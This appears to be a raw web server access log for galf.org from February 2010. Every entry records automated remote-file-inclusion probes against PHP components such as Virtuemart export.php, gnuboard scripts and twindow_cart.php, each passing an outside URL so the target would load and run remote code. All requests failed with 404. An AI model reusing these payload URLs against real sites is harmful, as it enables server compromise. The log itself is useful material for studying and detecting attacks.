219.240.39.222 - - [01/Feb/2010:02:22:53 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [01/Feb/2010:02:22:54 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:16 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:16 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:20 -0800] "GET /logs/access_090803.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:23:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:23:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:02:23:45 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [01/Feb/2010:02:23:45 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [01/Feb/2010:02:23:45 -0800] "GET /write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:54 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:54 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:56 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:56 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:23:59 -0800] "GET /logs/access_090803.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:24:01 -0800] "GET /logs/access_090803.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:24:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:24:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:24:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:24:11 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:24:11 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [01/Feb/2010:02:24:16 -0800] "GET /logs/access_100125.log//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:24:16 -0800] "GET /logs/access_090803.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:24:30 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
203.251.80.167 - - [01/Feb/2010:02:24:30 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
203.251.80.167 - - [01/Feb/2010:02:25:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:25:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:02:25:13 -0800] "GET ////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:02:25:13 -0800] "GET /logs/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:02:25:13 -0800] "GET /logs/access.log/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.63.198.52 - - [01/Feb/2010:02:25:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:26:53 -0800] "GET /logs/access_090629.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:26:53 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:26:53 -0800] "GET /logs/access_100104.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:26:53 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:27:01 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:27:01 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:27:01 -0800] "GET /logs/access_100104.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:27:01 -0800] "GET /logs/access_090629.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:31 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:31 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:27:38 -0800] "GET /logs/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.108.236.148 - - [01/Feb/2010:02:27:38 -0800] "GET /common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.108.236.148 - - [01/Feb/2010:02:27:38 -0800] "GET /logs/access.log%20%20/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:38 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:38 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:39 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:39 -0800] "GET /logs/access_091207.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:41 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:41 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:46 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:46 -0800] "GET /logs/access_091207.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:48 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:48 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:51 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:51 -0800] "GET /logs/access_091207.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:53 -0800] "GET /logs/access_091207.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:27:53 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:28:00 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:28:03 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:02:28:04 -0800] "GET /logs/access_090803.log//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:02:28:04 -0800] "GET /write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:02:28:04 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:28:08 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:28:34 -0800] "GET /logs/access_090921.log%20%20/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:28:39 -0800] "GET /common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:28:39 -0800] "GET /logs/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:55 -0800] "GET /logs/access_091130.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:55 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:55 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:56 -0800] "GET /logs/access_091130.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:56 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:56 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:57 -0800] "GET /logs/access_091130.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:57 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:28:57 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:03 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:03 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:03 -0800] "GET /logs/access_091130.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:03 -0800] "GET /logs/access_091130.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:03 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:04 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:04 -0800] "GET /logs/access_091130.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:04 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:04 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:29 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:29 -0800] "GET /logs/access.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:29 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:30 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:30 -0800] "GET /logs/access.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:30 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:38 -0800] "GET /logs/access_100111.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:42 -0800] "GET /logs/access_100111.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:29:44 -0800] "GET /logs/access_100111.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:30:06 -0800] "GET /logs/access.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:30:06 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:30:06 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:30:13 -0800] "GET /logs/access_090803.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:30:16 -0800] "GET /logs/access_090803.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:02:30:40 -0800] "GET /logs/access_090803.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [01/Feb/2010:02:31:14 -0800] "GET /logs/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.108.236.148 - - [01/Feb/2010:02:31:19 -0800] "GET /common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.108.236.148 - - [01/Feb/2010:02:31:19 -0800] "GET /logs/access.log/common/db.php?commonpath=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.13.69.245 - - [01/Feb/2010:02:31:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:31:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:32:39 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.wibs.co.kr/board/data/member/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:32:39 -0800] "GET /delete_all.php?board_skin_path=http://www.wibs.co.kr/board/data/member/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:32:40 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.wibs.co.kr/board/data/member/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:32:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:32:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
